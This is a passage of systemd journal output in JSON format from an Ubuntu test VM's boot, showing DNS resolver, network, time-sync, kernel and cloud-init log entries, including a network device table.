IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=248;b=e2b08827b5804427b422c10c84f1567e;m=264e354;t=5bd16df2862bc;x=dd13fe1df3b59488", "__REALTIME_TIMESTAMP" : "1615280814449340", "__MONOTONIC_TIMESTAMP" : "40166228", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "515", "MESSAGE" : "Negative trust anchors: 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa corp home internal intranet lan local private test", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449320" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=249;b=e2b08827b5804427b422c10c84f1567e;m=264e894;t=5bd16df2867fb;x=4753c52001af8008", "__REALTIME_TIMESTAMP" : "1615280814450683", "__MONOTONIC_TIMESTAMP" : "40167572", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : 
"6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_FILE" : "../src/resolve/resolved-manager.c", "CODE_LINE" : "517", "CODE_FUNC" : "manager_watch_hostname", "MESSAGE" : "Using system hostname 'test-1'.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814450676" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24a;b=e2b08827b5804427b422c10c84f1567e;m=2650144;t=5bd16df2880ab;x=e7f248e70e6d207c", "__REALTIME_TIMESTAMP" : "1615280814457003", "__MONOTONIC_TIMESTAMP" : "40173892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "MESSAGE" : "Started Network Name Resolution.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814452271" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24b;b=e2b08827b5804427b422c10c84f1567e;m=26501b2;t=5bd16df28811a;x=dd00ea5542cc278f", "__REALTIME_TIMESTAMP" : "1615280814457114", "__MONOTONIC_TIMESTAMP" : "40174002", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Host and Network Name Lookups.", "UNIT" : "nss-lookup.target", "INVOCATION_ID" : "6c96e169e38646ec879dc9c26874b07c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814454559" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24c;b=e2b08827b5804427b422c10c84f1567e;m=26510fd;t=5bd16df289064;x=9308da645fc2b823", "__REALTIME_TIMESTAMP" : "1615280814461028", "__MONOTONIC_TIMESTAMP" : "40177917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network.", "UNIT" : "network.target", "INVOCATION_ID" : "f0292f15c43a4eef96deaed11fec60ec", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814459237" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24d;b=e2b08827b5804427b422c10c84f1567e;m=2766411;t=5bd16df39e377;x=db1c5e6390bcf691", "__REALTIME_TIMESTAMP" : "1615280815596407", "__MONOTONIC_TIMESTAMP" : "41313297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596024" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24e;b=e2b08827b5804427b422c10c84f1567e;m=27666f4;t=5bd16df39e65c;x=23d4c70eda3aa2af", "__REALTIME_TIMESTAMP" : "1615280815597148", "__MONOTONIC_TIMESTAMP" : "41314036", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" 
: "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "741", "CODE_FUNC" : "link_enter_configured", "MESSAGE" : "ens3: Configured", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596134" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24f;b=e2b08827b5804427b422c10c84f1567e;m=2768482;t=5bd16df3a03e9;x=44777783d090e933", "__REALTIME_TIMESTAMP" : "1615280815604713", "__MONOTONIC_TIMESTAMP" : "41321602", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321437", "MESSAGE" : "random: crng init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=250;b=e2b08827b5804427b422c10c84f1567e;m=27684fe;t=5bd16df3a0466;x=cb3c66b18efc86ff", "__REALTIME_TIMESTAMP" : "1615280815604838", "__MONOTONIC_TIMESTAMP" : "41321726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321439", "MESSAGE" : "random: 7 urandom warning(s) missed due to ratelimiting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=251;b=e2b08827b5804427b422c10c84f1567e;m=2768525;t=5bd16df3a048c;x=e3c199751aa14f5f", "__REALTIME_TIMESTAMP" : "1615280815604876", "__MONOTONIC_TIMESTAMP" : "41321765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : 
"test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=252;b=e2b08827b5804427b422c10c84f1567e;m=27686ad;t=5bd16df3a0615;x=984b8385613f98c2", "__REALTIME_TIMESTAMP" : "1615280815605269", "__MONOTONIC_TIMESTAMP" : "41322157", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_LINE" : "89", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "MESSAGE" : "managing: ens3", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=253;b=e2b08827b5804427b422c10c84f1567e;m=276899a;t=5bd16df3a0902;x=ce2869e8bb367c39", "__REALTIME_TIMESTAMP" : "1615280815606018", "__MONOTONIC_TIMESTAMP" : "41322906", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "CODE_LINE" : "72", "MESSAGE" : "ignoring: lo", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598960" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=254;b=e2b08827b5804427b422c10c84f1567e;m=27689fb;t=5bd16df3a0963;x=cad5aeff3f93fbd8", "__REALTIME_TIMESTAMP" : "1615280815606115", "__MONOTONIC_TIMESTAMP" : "41323003", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "MESSAGE" : "Started Wait for Network to be Configured.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815601818" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=255;b=e2b08827b5804427b422c10c84f1567e;m=276a90f;t=5bd16df3a2877;x=3f8d6df4f98e116a", "__REALTIME_TIMESTAMP" : "1615280815614071", "__MONOTONIC_TIMESTAMP" : "41330959", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Initial cloud-init job (metadata service crawler)...", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815610953" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=256;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2f7facbcff3c248a", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init' at Tue, 09 Mar 2021 09:06:56 +0000. 
Up 41.82 seconds.", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=257;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=8cc996d422496cc0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=258;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : 
"635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=259;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=29b466862941ac8d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Device | Up | Address | Mask | Scope | Hw-Address |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2de0cabb7107f1d7", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | 192.168.10.95 | 255.255.255.0 | global | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25c;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=233b249cf336f0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", 
"_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | fe80::f816:3eff:fe55:6ae2/64 | . | link | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25d;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b46b42cabef260e0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . 
